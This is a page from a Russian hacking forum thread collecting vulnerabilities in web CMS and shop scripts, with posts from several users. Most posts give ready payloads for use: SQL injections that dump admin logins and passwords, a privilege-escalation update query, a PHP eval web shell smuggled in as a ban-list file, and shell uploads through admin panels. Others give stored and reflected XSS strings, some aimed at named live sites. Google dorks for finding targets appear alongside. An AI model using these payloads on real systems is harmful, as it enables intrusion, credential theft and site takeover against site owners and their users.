Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    AMX BANS 6.0.0 <= 6.0.1
    Продолжение поста:
    https://forum.antichat.ru/showpost.php?p=2248169&postcount=416
    Заливаем шелл.

    в куки
    Code:
    amxbans:' union select 1,0x27,1,4 -- :1233
    
    ->accsess.php.inc
    PHP:
    $query mysql_query("SELECT id,username,level,email FROM `".$config->db_prefix."_webadmins` WHERE logcode='".$sid."' LIMIT 1") or die (mysql_error());
            if(
    mysql_num_rows($query)) {
                while(
    $result mysql_fetch_object($query)) {
    $_SESSION["uid"]=$result->id;
    $_SESSION["uname"]=$result->username;
    $_SESSION["email"]=$result->email;
    $_SESSION["level"]=$result->level;
    $_SESSION["sid"]=session_id();
    $_SESSION["loggedin"]=true;
    }
    ->modul_iexport.php
    PHP:
    if($reason=="" || $plnick=="" || $server=="" || $date=="" || sizeof($date)!=3) {
    $user_msg="_NOREQUIREDFIELDS";
    } else {
    $date=(int)strtotime($date[2].$date[1].$date[0]);
    $file=mysql_real_escape_string($_FILES['filename']['name']);
    $types=array("cfg","txt");
            
    if(
    $file=="") {
    $user_msg="_FILENOFILE";
    } else {
    $file_type=substr(strrchr($file'.'),1); 
    if(!
    in_array($file_type,$types)) $user_msg="_FILETYPENOTALLOWED";
    }
    if(
    $_FILES['filename']['size'] >= ($config->max_file_size*1024*1024)) $user_msg="_FILETOBIG";
    if(!
    $user_msg) {
    if(!
    move_uploaded_file($_FILES['filename']['tmp_name'], "temp/".$file)) {
    $user_msg="_FILEUPLOADFAIL";
    } else {
    $handle fopen("temp/".$file,"r");
    $status["imported"]=0;
    $status["failed"]=0;
    while (!
    feof($handle))
    {
    $n fgets($handle,128);
    $bans=explode(" ",$n);
    $time=(int)trim($bans[1]);
    //amxbans 5.x hack, exported banned.cfg with reason
    $reason_real="";
    if(
    $bans[4] != "") {
    for(
    $i=4;$i<=sizeof($bans);$i++) {
    $reason_real.=mysql_real_escape_string($bans[$i])." ";
    }
    } else {
    $reason_real=$reason;
    }
    trim($reason_real);
    $steamid=mysql_real_escape_string(trim($bans[2]));
    if(
    trim($bans[0])=="" || trim($bans[0])=="//") continue;
    if(
    $time!=0) {$status["failed"]++;;continue;}
    if(
    trim($bans[0])=="banid") {
    //ban with steamid
    if(!preg_match("/^STEAM_0:(0|1):[0-9]{1,18}/",$steamid)) { $status["failed"]++; continue;}
    //search for a already existing permanent ban
    $query mysql_query("SELECT `player_id` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$steamid."' AND `expired`=0") or die (mysql_error());
    if(
    mysql_num_rows($query)) {$status["failed"]++; continue;}
    //write ban to db
    $status["imported"]++;
    $query mysql_query("INSERT INTO `".$config->db_prefix."_bans` 
    (`player_id`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`) VALUES 
    ('"
    .$steamid."','".$plnick."','".$_SESSION["uname"]."','S','".$reason_real."',".$date.",".$time.",'".$server."',1)") or die (mysql_error());
    }else if(
    trim($bans[0])=="banip") {
    //ban with ip
    if(!preg_match("/^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$/",$steamid)) { $status["failed"]++; continue;}
    //search for a already existing permanent ban
    $query mysql_query("SELECT `player_ip` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$steamid."' AND `expired`=0") or die (mysql_error());
    if(
    mysql_num_rows($query)) {$status["failed"]++; continue;}
    //write ban to db
    $status["imported"]++;
    $query mysql_query("INSERT INTO `".$config->db_prefix."_bans`(`player_ip`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`) 
    VALUES 
    ('"
    .$steamid."','".$plnick."','".$_SESSION["uname"]."','SI','".$reason_real."',".$date.",".$time.",'".$server."',1)") or die (mysql_error());
    } else { 
    $status["failed"]++; continue;}
    }
    fclose($handle);
    //del temp file
                    
    unlink("temp/".$file);
    Импортируем список банов "bans.php.cfg" с таким содержанием:
    Code:
    banid 0 STEAM_0:1:1234567891011121314151617
    <?php
    eval(stripslashes($_REQUEST['c']));
    ?>
    
    Чтобы после импорта наш шелл не удалился, нам пришлось добавить в куки " ' "(ковычку).
    В итоге в modul_iexport.php при загрузки файла, скрипт завершает работу с ошибкой.
    Шелл будет доступен по адресу:
    http://[path]/temp/bans.php.cfg
     
    4 people like this.
  2. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    cms.libe.net => 0.5 - 0.91
    Скачать: http://cms.libe.net/themen/DOWNLOAD.php


    Пассив XSS
    /template/cmslibenet/_suche.php

    PHP:
    <center><small>Stichwortsuche auf dieser Seite:</small><br>
    <form name="data" action="<?php echo $HTTP_SERVER_VARS['PHP_SELF'];?>" method="post" style="display:inline"><input type="text" name="Suchbegriff" value="" size="13"><INPUT TYPE="submit" name="suche" VALUE="suche"></form></center>
    .....
    $Suchbegriff=$HTTP_POST_VARS['Suchbegriff'];
    if (!empty($Suchbegriff)){
    echo "<div id=\"layer1\" style=\"position:absolute; left:200px; top:100px; width:600; height:100%px; z-index:2;filter:alpha(opacity=", $transparent, "); -moz-opacity: 0.", $transparent, ";\"><table width=600 cellspacing=", $cellspacing, " class=\"menu2\"><tr><td bgcolor=\"ffffff\">
    <div align=\"right\"><a href=\"", $HTTP_SERVER_VARS['PHP_SELF'], "\" class=\"links2\" title=\"Fenster schliessen\">X</a></div>";
    пример на оф сайте:
    http://cms.libe.net/template/cmslibenet/_suche.php
    PHP:
    "><script>alert(112233)</script ByPass>
    путь: http://cms.libe.net/template/cmslibenet/_feedback.php
     
    _________________________
    #422 Дирижабль, 21 Aug 2010
    Last edited: 21 Aug 2010
    1 person likes this.
  3. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    В интернете CMS не нашел.

    Aphyna CMS


    Code:
    http://[host]/[path]/index.php?sec=katalog&[some text]page=%27+and+0+union+select+1,2,3,4,5,6,7,8,9,10%23
    10 атрибут.


    Code:
    http://[hos]/[path]/index.php?sec=katalog&page=[some text]%27+and+0+union+select+1,2,3,4,5,6,7,8,9,GROUP_CONCAT%28concat_ws%28%27:%27,login,password%29%20separator%20%20%27@%27%29+FROM+users%23
    http://[host]/[path]/admin

    внутри:
    http://[host]/[path]/admin/site_info.php

    в левое поле пишем наш php код.
     
    _________________________
    #423 Strilo4ka, 30 Aug 2010
    Last edited: 30 Aug 2010
    1 person likes this.
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Fashione E-Commerce Webshop

    скачать

    в поиске
    http://www.mccabeshoes.com/index.php?page_id=search

    вбиваем в поле поиска
    Code:
    <script>alert('xss')</script>
     
    #424 547, 21 Sep 2010
    Last edited: 21 Sep 2010
    3 people like this.
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    _________________________
  6. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    phpComasy v1.0.1
    Скачать

    Активная XSS
    Пример одного сайта:
    Code:
    http://www.natamohn.com/?id=12&mod_action=add_guestbook_entry_form
    Уязвимые поля>>
    Code:
    Firstname* , Lastname, e-Mail , WWW ,  Comment*
    doc:powered by phpComasy
     
    _________________________
    #426 Дирижабль, 26 Oct 2010
    Last edited: 26 Oct 2010
    3 people like this.
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Apprain CMS
    Version:0.1.X

    Off Site: http://www.apprain.com/
    (1.11.2010)

    Заливка шелла через админку
    1. Способ| Gallery -> Add New Picture
    написанно "*.jpg, *.gif, *.png" но шелл заливается удачно, адресс шелла /uploads/filemanager/ *** .php
    2. Способ| Store-> Add New product

    PHP:
    var uploadAllFiles, uploadOnlyImageFiles;
        window.onload = function() {
            uploadAllFiles = new SWFUpload({
                // Backend Settings
                upload_url: "<?php echo $this->baseurl('/common/general_upload/'); ?>",
                post_params: {"PHPSESSID" : "<?php echo session_id(); ?>"},
                // File Upload Settings
                file_size_limit : "102400",    // 100MB
                file_types : "*.*",
                file_types_description : "All Files",
                file_upload_limit : "100",
                file_queue_limit : "0",
    .......
    Активная XSS

    /member/signup
    При регистрацыии Пользователя -> First Name - Last Name - Address
    PHP:
    echo $this->get_tag("form",array("method"=>"post","class"=>"app_form app_validation","id"=>"signup_form","action"=> $this->baseurl("/member/signup")));
            echo 
    $this->get_tag("ul");
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("First Name"),App::Load("Helper/Html")->inputTag("data[Member][f_name]","",array("class"=>"input check_notempty",'id'=>'f_name','longdesc'=>'Please enter your first name')) );
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("Last Name"),App::Load("Helper/Html")->inputTag("data[Member][l_name]","",array("class"=>"input check_notempty",'id'=>'l_name','longdesc'=>'Please enter your last name')) );
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("Country"), App::Load("Helper/Html")->countryTag("data[Member][country]","",array("title"=>"Country","id" => "country","class"=>"select check_notempty"),array('title'=>'Your Country','longdesc'=>'Please select your country')) );
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("Address"),App::Load("Helper/Html")->textareaTag("data[Member][address]","",array("rows"=>"3","class"=>"input check_notempty",'id'=>'address','longdesc'=>'Enter your address infomration')) );
    /admin/account/edit

    /information/manage/blog-post

    Редактируем "Title" на "><script>window.location.href='http://www.google.de/';</script>

    /admin/config/general
    Admin Setting -> Site Title

    и во многих других местах админки

    Пассивная XSS
    www.localhost/quickstart/admin/forgotlogin

    \development\view\system\admin\forgotlogin.phtml
    Fotgoet Password-> Enter you Email Address ->
    PHP:
    <li style="width:500px"><input  type="text" style="width:500px" name="data[Admin][email]" class="input_app_login" value="<?php echo isset($this->data['Admin']['email']) ? $this->data['Admin']['email'] : "" ?>" /></li>
    +
    Search
    \development\view\whitecloud\home\search.phtml
    PHP:
    <?php $this->__("Search Reasult for"?> '<?php echo $srcstr;?>'</h1>
        <?php if(!empty($srcarr['data'])):?>
            <p><?php echo $this->__("Total result found ");?><?php echo $srcarr['total']; </p>
        <?
    php if($srcarr['paging']): ?><br />
            <p><?php echo $srcarr['link'];?> <?php echo $srcarr['paging'];?></p>
            <?php endif;?><ul>
            <?php foreach($srcarr['data'] as $val):?>
                <li><h2><?php echo($val['_parmalink']);?></h2><p><?php echo substr(strip_tags($val['_parmadesc']),0,400);?>
     
    _________________________
    #427 Дирижабль, 1 Nov 2010
    Last edited: 1 Nov 2010
    2 people like this.
  8. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Уязвимости Open Constructor

    Тип уязвимости: SQL inj
    Зависимости: Права админа
    Куски уязвимых кодов:
    PHP:
    <?php
        
    require_once($_SERVER['DOCUMENT_ROOT'].'/openconstructor/lib/wccommons._wc');
        
    WCS::requireAuthentication();
        
        
    $db = &WCDB::bo();
        [
    B]$res $db->query('SELECT id, ds_type, obj_type FROM objects WHERE id='.$_GET['id']);[/B]
        
    $obj mysql_fetch_assoc($res);
        
    mysql_free_result($res);
        if(
    $obj) {
            
    header('Location: '.$obj['ds_type'].'/'.$obj['obj_type'].'.php?id='.$obj['id']);
            die();
        }
        
    assert(true === false);
    ?>
    PHP:
    <?php
        
    require_once($_SERVER['DOCUMENT_ROOT'].'/openconstructor/lib/wccommons._wc');
        
    System::request('data');
        require_once(
    LIBDIR.'/languagesets/'.LANGUAGE.'/editors._wc');
        
        
    assert(isset($_GET['ds_id']) && isset($_GET['id']));
        require_once(
    $_SERVER['DOCUMENT_ROOT'].WCHOME.'/include/toolbar._wc');
        require_once(
    LIBDIR.'/site/pagereader._wc');
        
    $pr = &PageReader::getInstance();
        require_once(
    LIBDIR.'/dsmanager._wc');
        
    $dsm = new DSManager();
        
    $_ds = &$dsm->load($_GET['ds_id']); 
        
    assert($_ds->ds_id 0);
        
        if(
    $_GET['id'] == 'new') {
            
    $pages = &$pr->getAllPages();
            
    $db = &WCDB::bo();
            
    $res $db->query(
                
    'SELECT id '.
                
    'FROM dshtmltext '.
                
    'WHERE ds_id = '.$_ds->ds_id
            
    );
            while(
    $r mysql_fetch_assoc($res))
                unset(
    $pages[$r['id']]);
            
    mysql_free_result($res);
        } else {
            
    $page = &$pr->getPage($_GET['id']);
            
    assert($page != null);
            
    $_doc $_ds->get_record($_GET['id']);
            
    assert($_doc != null);
        }
        require_once(
    LIBDIR.'/syntax/syntaxhighlighter._wc');
        
    $m = array();
        
    preg_match_all('~<([A-Z0-9]+)~'strtoupper($_ds->allowedTags), $mPREG_PATTERN_ORDER);
        
    $allowed = (array) @$m[1];
        
    $sDoc $_ds->wrapDocument($_doc);
        
    $save $_GET['id'] == 'new' WCS::decide($_ds'createdoc') && sizeof($pages) > WCS::decide($_ds'editdoc') || WCS::decide($sDoc'editdoc');
    ?>
    Примеры:
    localhost/../objects/edit.php?j=1&id=4%20union%20select%201,2,3--



    localhost/../../htmltext/edit.php?ds_id=90&id=36%20union%20select%201,2,3,4,5,6,7,8--
     
    #428 -PRIVAT-, 2 Nov 2010
    Last edited by a moderator: 2 Nov 2010
    1 person likes this.
  9. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Уязвимости Simple CMS

    О Simple CMS​

    От себя хочу сказать, что Simple CMS. ver.1.0. вся дырявая. Почти на каждом месте есть SQL inj.
    По дорку гугла мне выдало "Результатов: примерно 14 800 (0,35 сек.) ".

    SQL инъекции:​

    SQL inj в выборе статьи, уязвимый код:
    PHP:
    if (isset($_GET['artcl']))
    {
        
    $id_art $_GET['artcl'];
        
    $article mysql_query("SELECT title, article FROM artcl WHERE IDart=".$id_art);
    Как видно, нет никакой фильтрации..
    Пример: localhost/index.php?id=3&artcl=-4 union select version(),2--

    SQL inj в выборе раздела, уязвимый код:
    PHP:
        if (isset($_GET['id']))
        {
            
    $id $_GET['id'];
        }
        else
        {
            
    $id 1;
        }
        print 
    "<table width='100%' cellpadding=2 cellspacing=2>";
        
    $razdel mysql_query("SELECT menu, txt FROM tree WHERE id=".$id);
    Пример: localhost/index.php?id=-3 union select 1,version()--

    Незачем дальше перечислять, она вся в дырках.
    К сожалению, хочу отметить, что пароли администраторов не хранятся в БД. Они находятся в файле connect.php.
    Панель администратора находится по адресу /admin/, если вы попали в админку, то заходим: Баннеры > льём через форму загрузки баннеров шелл > шелл будет доступен по адресу images/shell.php
    Вот вам пример, хекайте!
    P.S Дорк "intext:Разработано Яшиной С. svetulik2004@mail.ru".

    Модуль Новостей​

    Только что зашёл на официальный сайт в раздел Мои разработки, скачал модуль новостей и снова он бажный :(.
    PHP:
    if (isset($_GET['id_news']))
            {
                
    $id_news $_GET['id_news'];
                
    $news mysql_query("SELECT rus_name, rus_annonce, rus_content, date FROM news WHERE id=".$id_news);
    Пример: localhost/news/news.php?id_news=-2 union select version(),2,3,4--


    З.Ы Писала движок девушка ;). Официальный сайт

     
    #429 -PRIVAT-, 2 Nov 2010
    Last edited by a moderator: 2 Nov 2010
  10. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Уязвимости Booot CMS

    Тип уязвимости: SQL inj
    Зависимости: Права админа

    Куски уязвимых кодов:
    PHP:
    if(isset($_GET['top'])) {
                
    $i $this->db->rows("SELECT * FROM `prefix_products_topics` WHERE `id` = ".$_GET['top']);

    PHP:
    if(!isset($_GET['top'])) {
    ....
    $i $this->db->rows("SELECT * FROM `prefix_content` WHERE `id` = ".$_GET['top']);
    PHP:
    if(!isset($_GET['top'])) {
    ....
    $i $this->db->rows("SELECT * FROM `prefix_content` WHERE `id` = ".$_GET['top']);
    Примеры:
    host/admin/?module=Catalog&method=Info&top=-12 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--


    host/admin/?module=Content&method=Info&top=-5 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3--
    Уязвима вся админка. Видимо разработчики решили, что баги в админке никому не нужны..​
     
    #430 -PRIVAT-, 2 Nov 2010
    Last edited by a moderator: 2 Nov 2010
  11. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Дополнение к посту от SeNaP
    WAP ENGINE 4.2 (Возможно и другие версии)

    активная xss в гостевой книге

    \modules\guest\send.php
    PHP:
    $url "$_POST[url]";
    ...
    $url trim($url);
    $url str_replace('http://','',$url);
    $url str_replace('|'''$url);
    Сайт (URL): __XSS

    Путь
     
    _________________________
    1 person likes this.
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Ajax OnlineShop 1.0

    SQL Injection

    оффсайт:
    Code:
    http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29

    параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split


    PHP:
    // if get id in url but no #
                if ( (<? echo $id_page; ?> != 0) && (!<? echo $startpage ?>) && (document.URL.search(/#.+/) == -1) ) {
                    wohinJS = 'reload';
                    var start_name = document.URL.split ('?id=');
                    var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
                    addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
                }
                else {
                    var start_name = document.URL.split ('#');
                    <? if ($reg_now == 0) { // no registration ?>
                        if (start_name[1]) { // exist history-ID in url...
                            wohinJS = 'reload';
                            start_name = start_name[1].split ('('); // ...yes, split the name
                            var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
                            //$('log').innerHTML = start_name[0] + " - " + start_id; // testing
                            var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
                            addHistoryEvent(hist_event_name, start_id); // load requested page
                        }
                        else { // ...no, then load shop-startpage
                            <?
                                echo get_startpage_link(false, true);
                            ?>                    
    уязвимы все сайты,их достаточно много:)
     
    #432 547, 13 Nov 2010
    Last edited: 13 Nov 2010
    2 people like this.
  13. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    547, не тот код уязвим.
    Так правильнее будет.
    --->index.php
    PHP:
    if ( (isset($_GET['id'])) && ($_GET['id'] != "") ) { 
        
    $startpage "false"
        
    $id_page $_GET['id']; 

    else { 
        
    $id_page get_startpage_link(falsefalsetrue); 
        
    $startpage "true"

    $seo_infos seo_get_site_infos($id_page);
    --->config.php
    PHP:
    function get_prod_comments($page$prod_id$new_added) {  
    global 
    $db$js$outputText ""$backgr_zaehler 0$backgr "backgroundcolor: #".$GLOBALS["row_colors"]['backgr_maindivs'].";"


    $seitenzahl_arr gen_seitenzahlarr($page"""""aong_shop_art_comments"$db"prodID = {$prod_id} AND del='N'""prodcomments"); 


    $limit ""
    if (!
    $js) {  
        
    $limit " LIMIT ".$seitenzahl_arr["start"].", ".$seitenzahl_arr["proseite"];  



    $result $db->sql("SELECT * FROM aong_shop_art_comments ".$seitenzahl_arr["where_state"]." ORDER BY ID DESC{$limit}");


     
    $page_prodcomments_amount $db->count_rows(); 
      if (!
    $js) { 
                
    $outputText .= gen_seitenzahlen($page1$seitenzahl_arr["proseite"], $seitenzahl_arr["seiten"], $seitenzahl_arr["start"], "oben""""""""""prodcomments"$prod_id); 
                } 
       
    $outputText .=  
       
    "<div id=\"div_prodcomments\" class=\"div_main_inhalt\" style=\"width: 618px; {$backgr} text-align: left; margin: 0px; border-left: 0px; border-right: 0px; border-bottom: 0px; padding: 0px 0px 0px 0px; border-top: 0px;\">"
      while (
    $row mysql_fetch_array($result)) { 
          
         if (
    $backgr_zaehler%== 0){  
              
    $backgr "background-color: #".$GLOBALS["row_colors"]['backgr_maindivs'].";";  
              }  
         else{  
              
    $backgr "background-color: #".$GLOBALS["row_colors"]['backgr_div_weich'].";";  
             } 
                   
         if ( (
    $new_added) == && ($backgr_zaehler == 0) ){ 
                
    $new_added_addon " color: #2A5206;";  
              }  
         else {  
                
    $new_added_addon "";  
              } 
           
         
    $outputText .= 
            <div style=\"clear: both; float: left; width: 614px;
    {$new_added_addon} padding: 0px 2px 0px 2px; {$backgr} font-size: 11px; border-top: 1px solid #".$GLOBALS["row_colors"]['rahmenfarbe_divs'].";"
         if (
    $backgr_zaehler == 0) { 
          
    $outputText .= " padding-top: 5px;";  
          }  
         
    $outputText .= "\"><b>".$row["name"]."</b></div><div style=\"clear: both; float: left; width: 200px;{$new_added_addon} padding: 0px 2px 0px 2px; {$backgr} font-size: 11px;\"><i>am ".date("d.m.Y"$row["time"])." um ".date("H:i"$row["time"])." Uhr</i> 
            </div> 
            <div style=\"float: right; width: 410px; text-align: right;
    {$new_added_addon} padding: 0px 2px 0px 2px; {$backgr} font-size: 11px;\"> 
                <i>vor "
    .intervall(time()-$row["time"])."</i> 
            </div> 
                 
            <div style=\"clear: both; float: left; width: 614px;
    {$new_added_addon} {$backgr} font-size: 11px; padding: 10px 2px 20px 2px;\"> 
                "
    .nl2br($row["txt"]).
            </div>"
    ;  
         
        
    $backgr_zaehler++;  
      } 
         
    $outputText .= "</div>";  
         if (!
    $js) {  
            
    $outputText .= gen_seitenzahlen($page1$seitenzahl_arr["proseite"], $seitenzahl_arr["seiten"], $seitenzahl_arr["start"], "unten""""""""""prodcomments"$prod_id);  
          }  
    return 
    $outputText;  

    ....
    https://rdot.org/forum/showpost.php?p=9338&postcount=5
     
    #433 SeNaP, 14 Nov 2010
    Last edited: 15 Nov 2010
    1 person likes this.
  14. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    MyMuWeb 0.7,0.6 (более ранние не смотрел)

    Движок довольно часто встречается на игровых серверах Mu Online. Фикс давно вышел, но есть еще довольно много "отсталых".

    Sql injection :

    Code:
    http://localhost/?ref='updаtе/**/memb_info/**/set/**/mmw_status='9'/**/where/**/memb___id='Ваш юзернейм'--&ref=Существующий на сервере юзернейм (можно свой)
    П.С. БД железобетонно MSSQL.
     
    #434 DeepBlue7, 15 Nov 2010
    Last edited: 15 Nov 2010
    1 person likes this.
  15. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Дополнение к посту от 547

    Ajax OnlineShop 1.0

    Xss
    офф-демо-сайт
    Code:
    http://www.ajax-onlineshop.de/demo/index.php?id=1"><script>alert('d0s')</script>
    +xss на офф.сайте
    Code:
    http://www.ajax-onlineshop.de/servicemail/
    Заполняем все поля,уязвимое поле - Name
    Вбиваем туда что-нибудь типо
    Code:
    "><script>alert(1)</script><
     
    1 person likes this.
  16. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    osPHPSite 0.0.1 Beta
    http://www.osphpsite.com/

    SQL Injection:
    /index.php
    PHP:
    ...
    $id $_GET['id'];
    database_connect();
    $query "SELECT * from content
              WHERE id = 
    $id";
    ...
    Пример:
    Code:
    http://php/index.php?id=25%20union%20select%201,concat_ws(0x3a,id,username,password),3,4,5,6,7,8 from user--
    
    Необходимы права администратора. Путь:
    Code:
    http://php/admin/index.php?page[]=config
    Многие места так же уязвимы к SQL inj. Скрипт полностью бажный.
     
    2 people like this.
  17. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    NinkoBB v. 1.3
    http://ninkobb.com/

    XSS:
    Создаем новый топик, по адресу message.php с "Subject" и "Message" содержанием:
    Code:
    <script>alert('xss')</script>[/B]
    
    И пока топик висит на главной странице имеем активную XSS.
     
    1 person likes this.
  18. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    KAPCMS v0.904
    http://kapcms.ru/

    XSS
    Вписываем в поле поиска пишем:
    Code:
    <script>alert(1)</script>
    
    Гет запрос будет выглядить следующем образом:
    Code:
    http://kapcms.ru/?s=<script>alert(1)</script>&page=11[/B]
    
     
    1 person likes this.
  19. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Creativestate
    Тип уязвимости: SQL inj

    http://www.creativestate.com/work
    dork:Site design by Creative State

    админка:localhost/admin/

    пример:/index.cfm?id=-2%20union%20select%201,2,3,4,5,6,7,8,group_concat(managerLogin,0x3a,managerPassword)%20from%20managers%20--
     
    1 person likes this.
  20. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Web@all CMS
    http://webatall.com/
    XSS
    Вписываем в поле поиска (сразу под формой входа в правом верхнем углу,если кто ненашел):
    Code:
    <script>alert(document.cookie)</script>
     
    #440 ~d0s~, 11 Dec 2010
    Last edited: 11 Dec 2010
Loading...